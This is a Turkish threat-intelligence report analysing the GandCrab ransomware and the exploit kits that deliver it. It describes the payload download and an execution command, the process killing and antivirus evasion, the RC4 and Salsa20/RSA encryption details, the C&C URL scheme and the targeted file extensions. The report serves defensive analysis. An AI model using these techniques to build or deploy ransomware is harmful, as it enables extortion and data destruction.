Görsel 33 RIG Exploit kiti saldırı ve enfeksiyon grafiği.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
cmd. exe ile tetiklenen zafiyet ile Gandcrab’i sisteme indirip çalıştıran javascript kodu aşağıdaki gibidir.
Görsel 34 Javascript dropper kodu.
Kodun düzenlenmiş hali aşağıdaki görselde yer almaktadır.
Görsel 35 Js Dropper düzenlenmiş kod.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
İndirilen dosya %TEMP% dizini altına b25.exe olarak konulmaktadır. Dosya ismi oluşturma algoritması incelendiğinde b[0–56].exe şeklinde dosya oluşturulduğu görülmüştür.
Son indirilen Gandcrab payload’ı aşağıdaki komut ile çalıştırılmaktadır.
C:\Windows\System32\cmd.exe” /c b25.exe
GrandSoft exploit kitine ait görsele aşağıda yer verilmiştir.
Görsel 36 Grandsoft exploit kiti.
GrandSoft exploit kitinde ise CVE-2016–0189 zafiyeti bulunan Internet Explorer sürümü saldırı kampanyası için kullanılmaktadır. İlgili zafiyet Internet Explorer içerisinde yer alan vbscript.dll kütüphanesinde bulunan memory corruption zafiyetinden kaynaklanmaktadır. İlgili zafiyet Mayıs 2016 tarihinde yamanmıştır fakat yamanmamış sistemler üzerinde vbscript kodları çalıştırılabilinmektedir.
Salgın kampanyasında kullanılan vbscript koduna aşağıda yer verilmiştir.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 37 Vbscript kodu.
İndirilen dosya, indirildiği uzantıya göre sistemde çalıştırılmaktadır.
Görsel 38 Vbscript kodu.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
EITest exploit kitine ait görsele aşağıda yer verilmiştir.
Görsel 39 EITest isimli exploit kiti.
Necurs exploit kitine ait görsele aşağıda yer verilmiştir. Invoice isimli javascript dosyaları E-Posta eki olarak gelmektedir.
Görsel 40 Invoice isimli javascript dosyası
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
2) GandCrab Payload Analizi
Zararlı, çalışmaya başladığı andan itibaren enfekte olduğu makine üzerindeki dosyaları
şifrelemektedir. Zararlı aynı zamanda enfekte makineye ait masaüstü arka planını fidye mesajı ile
değiştirmekte ve şifrelenen klasörlerin içerisinde fidye ödemesine dair detayların yer aldığı html sayfası
oluşturmaktadır.
Fidye ödemesine dair detayların yer aldığı görsele aşağıda yer verilmiştir. İlgili html dosyası şifrelenen her klasörün içerisine yerleştirilmektedir.
Görsel 42 Kurbanın cihazındaki her klasöre ilgili html dosyası yerleştirilmektedir.
Görsel 41 Gandcrab masaüstü arkaplanı
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Gandcrab örneklerine ait versiyon bilgileri uygulama içerisinde yer almaktadır.
Görsel 43 GandCrab versiyon bilgisi.
Gandcrab, kod akışına devam etmeden önce ilk olarak aşağıdaki proseslerin enfekte olduğu
sistemde çalışıp çalışmadığını kontrol etmektedir.
Görsel 44 GandCrab çalışan process kontrolü.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Kontrol edilen prosesler içerisinde o an sistemde aktif olan varsa, çalışan prosesin çalışması sonlandırılmaktadır.
Görsel 45 GandCrab çalışan processin sonlandırılması.
Kontrol edilen proseslerin listesine aşağıdaki tabloda yer verilmiştir.
S.N. Process Adı
1 msftesql.exe
2 sqlagent.exe
3 sqlbrowser.exe
4 sqlwriter.exe
5 oracle.exe
6 ocssd.exe
7 dbsnmp.exe
8 synctime.exe
9 agntsvc.exe
10 isqlplussvc.exe
11 xfssvccon.exe
12 sqlservr.exe
13 mydesktopservice.exe
14 ocautoupds.exe
15 agntsvc.exe
16 encsvc.exe
17 firefoxconfig.exe
18 tbirdconfig.exe
19 mydesktopqos.exe
20 ocomm.exe
21 mysqld.exe
22 mysqld-nt.exe
23 mysqld-opt.exe
24 dbeng50.exe
25 sqbcoreservice.exe
26 excel.exe
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
27 infopath.exe
28 msaccess.exe
29 mspub.exe
30 onenote.exe
31 outlook.exe
32 powerpnt.exe
33 steam.exe
34 sqlservr.exe
35 thebat.exe
36 thebat64.exe
37 thunderbird.exe
38 visio.exe
39 winword.exe
40 wordpad.exe
Gandcrab, enfekte olduğu makine ile ilgili keşif yaparak işlemlere başlamaktadır. Keşif aşamasında elde edilen makine bulguları aşağıda listelenmiştir.
S.N. Makine Bulgusu
1 Kullanıcı adı
2 Bilgisayar adı
3 Domain adı
4 Yerel bilgi
5 Klavye düzeni
6 İşletim sistemi bilgisi
7 Kurulu antivirüs yazılımları
8 İşlemci tipi ve adı
9 Sürücü tipleri
10 Dahili bellekteki boş alan
11 IP adres bilgisi
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 46 Enfekte makineye ait bulgular.
Görsel 47 Enfekte makineye ait bulgular.
Keşif aşamasında GandCrab klavye düzenini kontrol ederken Rusça klavye düzeni ile karşılaşırsa, zararlının kendi prosesini sonlandırdığı gözlemlenmiştir. Kontrol edilen diller aşağıdaki gibidir:
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 48 Kontrol edilen klavye düzenleri.
Sistemde kurulu olan antivirüs uygulamaları Gandcrab tarafından kontrol edilmektedir.
Görsel 49 Kontrol edilen antivirüs uygulamaları.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
İlgili kontrollerin yapıldığı fonksiyona ait kodlara aşağıdaki görselde yer verilmiştir.
Görsel 50 Ghidra Kontrol edilen antivirüs uygulamaları ekran görüntüsü
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Kontrol edilen antivirüs uygulamalarına ait listeye aşağıda yer verilmiştir.
S.N. Antivirüs Adı
1 Kaspersky Internet Security
2 Eset Nod32 Antivirus
3 Avira Antivirus
4 Avast Antivirus
5 Norton Anti Bot
6 Mcafee Antivirus
7 Panda Antivirus
8 Comodo Antivirus
9 Symantec Endpoint
10 Tiny Firewall
11 Trend Micro Internet Security
12 F-Secure Internet Security
13 Microsoft Security Essentials
Gandcrab aynı zamanda seri numarası, işlemci adı ve işlemci tanımlayıcısının birleştirilmesi ile oluşan dizinin CRC32 özet(hash) değerini hesaplayarak her enfekte makine için benzersiz bir Ransom-ID değeri üretmektedir.
Analiz sırasında enfekte olan makine için üretilmiş olan Ransom-ID değeri aşağıdaki gibidir.
Enfekte edilen sistemin tekrar enfekte edilmemesi için mutex oluşturulmakta ve varolan mutex’in kontrolü yapılmaktadır.
Mutex işlemlerinin ardından analiz sırasında aşağıdaki link dikkat çekmektedir.
Linkin içeriği incelenince aşağıda yer alan görsel ile karşılaşılmıştır. Görselde, analistlere karşı Rusça argo ifade yer almaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 51 Görselde kullanılan dil: Rusça.
Keşif işlemlerinin bitmesinin ardından Gandcrab, elde ettiği cihaz bilgilerini RC4 algoritması ile şifreledikten sonra Base64 ile encode etmektedir.
RC4 ile şifreleme işlemi yapılmadan hemen önce RC4 algoritmasına ait secret key stack veri yapısına eklenmektedir.
Görsel 52 Payload örneğinin kullandığı gizli anahtar: Jopochlen
İlgili fonksiyona ait kaynak koda aşağıdaki görselde yer verilmiştir.
Görsel 53 Ghidra jopochlen anahtarı ekran görüntüsü
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Analiz edilen Gandcrab payload örneği “jopochlen” isimli gizli anahtarı kullanmaktadır. İlgili
gizli anahtar ile RC4 şifrelemesi yapıldıktan sonra Base64 encode işlemi yapılmaktadır.
Görsel 54 Rc4 ardından Base64 encode işleminin gerçekleştirilmesi.
Gandcrab, enfekte olduğu makinedeki dosyaları şifrelemeden önce bir takım dosya kontrolleri
yapmaktadır. İlk başta şifrelenmeyecek dizinlerin kontrolünü gerçekleştirmektedir.
Görsel 55 Şifrelenmeyecek dizinlerin kontrol edilmesi.
Şifreleme işleminin gerçekleşmeyeceği dizinler aşağıda listelenmiştir.
S.N. Dizin Adı
1 \\Program Data\\
2 \\IETldCache\\
3 \\Boot\\
4 \\Program Files\\
5 \\Tor Browser\\
6 \\All Users\\
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
7 \\Local Settings\\
8 \\Windows\\
9 \\Program Files (x86)\\
10 \\Program Files\\Common\\
Dizin kontrolünün ardından şifreleme işleminin gerçekleşmeyeceği dosyaların kontrolü
yapılmaktadır.
Görsel 56 Şifreleme işleminin yapılmayacağı dosyaların kontrolü.
Şifreleme işleminin gerçekleşmeyeceği dosyalara ait listeye aşağıda yer verilmiştir.
S.N. Dosya İsmi
1 desktop.ini
2 autorun.inf
3 ntuser.dat
4 iconcache.db
5 bootsect.bak
6 boot.ini
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
7 ntuser.dat.log
8 thumbs.db
9 Bootfont.bin
10 KRAB-DECRYPT.html
11 KRAB-DECRYPT.txt
12 CRAB-DECRYPT.txt
13 NTDETECT.COM
14 ntdlr
15 ntuser.dat
Şifreleme algoritmasında kullanılacak olan public key .data segmentinde şifrelenmiş bir şekilde
yer almaktadır.
Görsel 57 Şifrelenmiş public key.
İlgili public key aşağıdaki görselde yer alan algoritma ile deşifrelenmekte, decrypt edilen key değeri heap belleğe ve global değişkende saklanan bellek işaretçisine daha sonra kullanılmak üzere konulmaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 58 Public keyi deşifre eden algoritma
Şifrelenmiş dizi elemanları önce 0x5 ile xor edilerek ardından Salsa20 stream cipher kullanılarak
deşifreleniyor. Ayrıca kod içerisinde Salsa20 algoritmasının mucidi Daniel Bernstein’a gönderme yapılmaktadır.
Görsel 59 Salsa20 algoritmasının kullanıldığına dair ipucu.
Public ve private anahtarları işlemci tarafında Microsoft Cryptographic Provider ve aşağıdaki API fonksiyonları kullanılarak oluşturulmaktadır.
S.N. API Fonksiyonu
1 ADVAPI32.CryptAcquireContextW
2 ADVAPI32.CryptGenKey
3 ADVAPI32.CryptExportKey
4 ADVAPI32.CryptDestroyKey
5 ADVAPI32.CryptReleaseContext
6 ADVAPI32.CryptImportKey
7 ADVAPI32.CryptGetKeyParam
8 ADVAPI32.CryptEncrypt
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 60 Kullanılan API fonksiyonu.
Dinamik olarak oluşturulan fonksiyonlara ait kod parçası aşağıdaki gibidir.
Görsel 61 Ghidra Dinamik oluşturulan fonksiyonlar ekran görüntüsü
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Şifreleme anahtarlarının oluşturulması ve dosyaların şifrelenmesine ait genel görsele aşağıda yer verilmiştir.
Görsel 62 Şifreleme metodolojisi.
Dosyaların şifrelenmesine ait adımlar :
1) İlk olarak Salsa20 stream cipher ile bellekte gömülü olarak yer alan RSA-2048 public key çözülmektedir.
2) Salsa20 algoritmasının başlangıç durumu, gömülü olarak yer alan RSA-2048 public key’ini decode etmektedir. Bu işlem yapılırken aşağıdaki alanlara göre yapılmaktadır.
Sabit değer: “expand 32-byte k”
Anahtar değeri: “@hashbreaker Daniel J. Bernstei”
Nonce değeri: “@hashbr.”
Konum bitleri 0'dır ve encoding/decoding sırasında artırılır. 3) RSA-2048 public/private anahtar çiftini oluşturmak için CryptGenKey metodu
kullanılmaktadır. 4) Salsa20 anahtarı olan veya olmayan bir 32 bayt ve 8 bayt değer üretmek için iki kez
CryptGenRandom çağrılmaktadır. 5) Oluşturulan RSA-2048 private anahtarı Salsa20 matrisi ile şifrelenmektedir. Bu işlem bir
önceki maddede üretilen rastgele değerler ile gerçekleştirilmektedir. 6) Ana Salsa20 anahtarı ve nonce değeri (“@hashbr.”) gömülü RSA-2048 public anahtarı ile
şifrelenmektedir. Bu işlem yapılırken CryptEncrypt metodu kullanılmaktadır. 7) RSA-2048 public key, RegSetValueEx metodu ile
HKCU\Software\keys_data\data\public” kayıt defteri alanına yazılır. Salsa20 anahtarı ve nonce değeri (“@hashbr.”), RSA-2048 public anahtarı ile şifrelenmiş hali ile “HKCU\Software\keys_data\data\private” kayıt defteri alanına yazılmaktadır.
8) Oluşturulan RSA-2048 public anahtarı ile her dosya için benzersiz olan Salsa20 anahtarlarını ve nonce değerleri şifrelenir.
9) Salsa20 anahtar akışı oluşturulurken temel yöntem XOR operatörüdür.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 63 Dosyaların şifrelenme metodolojisi.
Şifrelenmiş dosyalara ait detaylar ise aşağıdaki gibidir:
Dosya içeriği, her dosya için benzersiz olan Salsa20 anahtar ve nonce değerleri ile şifrelidir. Salsa20 anahtarı, oluşturulan RSA-2048 public anahtar ile şifrelenmiştir. Salsa20 nonce değeri, oluşturulan RSA-2048 public anahtar ile şifrelenmiştir.
C&C mekanizması incelendiğinde 200'den fazla domain adresine bağlantı kurulduğu görülüyor. Bağlantı kurulan domain adreslerine IOC kısmında yer verilmiştir.Encrypted olarak tutulan domain adreslerinin bağlantı kurulmadan önce decrypt edilmesi işlemine ait kod parçası aşağıdaki gibidir.
Görsel 64 Ghidra domain adreslerinin decrypt edilmesi ekran görüntüsü
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
URL adresine ait oluşturma düzeni http://{host}/{deger1}/{deger2}/{path}.{uzanti} şeklinde tespit edilmştir. URL oluşturma düzeninde yer alan kısımlar aşağıdaki görsellerde yer almaktadır. {deger1} kısmının üretilmesi;
Görsel 65 {deger1} kısmının üretim adımı.
{deger2} kısmının üretilmesi;
Görsel 66 {deger2} kısmının üretim adımı.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
{path} kısmının üretilmesi;
Görsel 67 {path} kısmının üretim adımı.
{uzanti} kısmının üretilmesi;
Görsel 68 {uzantı} kısmının üretim adımı.
Yukarıdaki işlemler tüm domainler için tamamlandıktan sonra örnek bir bağlantı aşağıdaki gibi olmaktadır.
Görsel 69 Tamamlanan bağlantı
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Kurulan bağlantıya ait kod parçası aşağıdaki görselde yer almaktadır.
Görsel 70 Ghidra kurulan bağlantıya ait ekran görüntüsü
Şifreleme anahtarı oluşturma adımları tamamlandıktan sonra şifrelenmiş dosyaların uzantısı
değiştirilmektedir. Aşağıdaki algoritma ile dosya uzantısı üretilmektedir.
Görsel 71 Dosya uzantısı üretim adımı
Dosya uzantıları ^[A-Z]{5}$ regex ifadesi ile belirlenen 5 karakterlik harfler bütünüdür.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Görsel 72 Dosya uzantılarının beş karakterden oluştuğuna dair ekran görüntüsü
Gandcrab şifrelenecek dosya uzantılarının kontrolünü de gerçekleştirmektedir.
Encrypted olarak tutulan dosya uzantıları aşağıdaki görselde yer alan fonksiyon ile decrypt edilerek belleğe yazılmaktadır.
Görsel 73 Ghidra dosya uzantılarının decrypt edilmesine ait ekran görüntüsü.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Kontrol edilen dosya uzantıları içerisindeki bir ifade dikkat çekmektedir.
Görsel 74 zerophage isimli twitter kullanıcısına yapılan atıf.
“.zerophage_i_like_your_pictures” ifadesi Twitter’da zerophage kullanıcı isimli zararlı yazılım
araştırmacısına yapılan bir göndermedir.
Kontrol edilen tüm dosya uzantıları:
.cab.arj.lzh .tar .7z .gzip .iso .z .7-zip .lzma .vmx .vmdk .vmem .vdi .vbo.1st .602 .docb .xlm .xlsx .xlsm .xltx .xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam .ppsx .ppsm .sldx .sldm .xps .xls .xlt ._doc .dotm ._docx .abw .act .adoc .aim .ans .apkg .apt .asc .asc .ascii .ase .aty .awp .awt .aww .bad .bbs .bdp .bdr .bean .bib .bib .bibtex .bml .bna .boc .brx .btd .bzabw .calca .charset .chart .chord .cnm .cod .crwl .cws .cyi .dca .dfti .dgs .diz .dne .dot .doc .docm .dotx .docx .docxml .docz .dox .dropbox .dsc .dvi .dwd .dx .dxb .dxp .eio .eit .emf .eml .emlx .emulecollection .epp .err .err .etf .etx .euc .fadein.template .faq .fbl .fcf .fdf .fdr .fds .fdt .fdx .fdxt .fft .fgs .flr .fodt .fountain .fpt .frt .fwd .fwdn .gmd .gpd .gpn .gsd .gthr .gv .hbk .hht .hs .hwp .hwp .hz .idx .iil .ipf .ipspot .jarvis .jis .jnp .joe .jp1 .jrtf .jtd .kes .klg .klg .knt .kon .kwd .latex .lbt .lis .lnt .log .lp2 .lst .lst .ltr .ltx .lue .luf .lwp .lxfml .lyt .lyx .man .mbox .mcw .md5 .me .mell .mellel .min .mnt .msg .mw .mwd .mwp .nb .ndoc .nfo .ngloss .njx .note .notes .now .nwctxt .nwm .nwp .ocr .odif .odm .odo .odt .ofl .opeico .openbsd .ort .ott .p7s .pages .pages-tef .pdpcmd .pfx .pjt .plain .plantuml .pmo .prt .prt .psw .pu .pvj .pvm .pwd .pwdp .pwdpl .pwi .pwr .qdl .qpf .rad .readme .rft .ris .rpt .rst .rtd .rtf .rtfd .rtx .run .rvf .rzk .rzn .saf .safetext .sam .sam .save .scc .scm .scriv .scrivx .sct .scw .sdm .sdoc 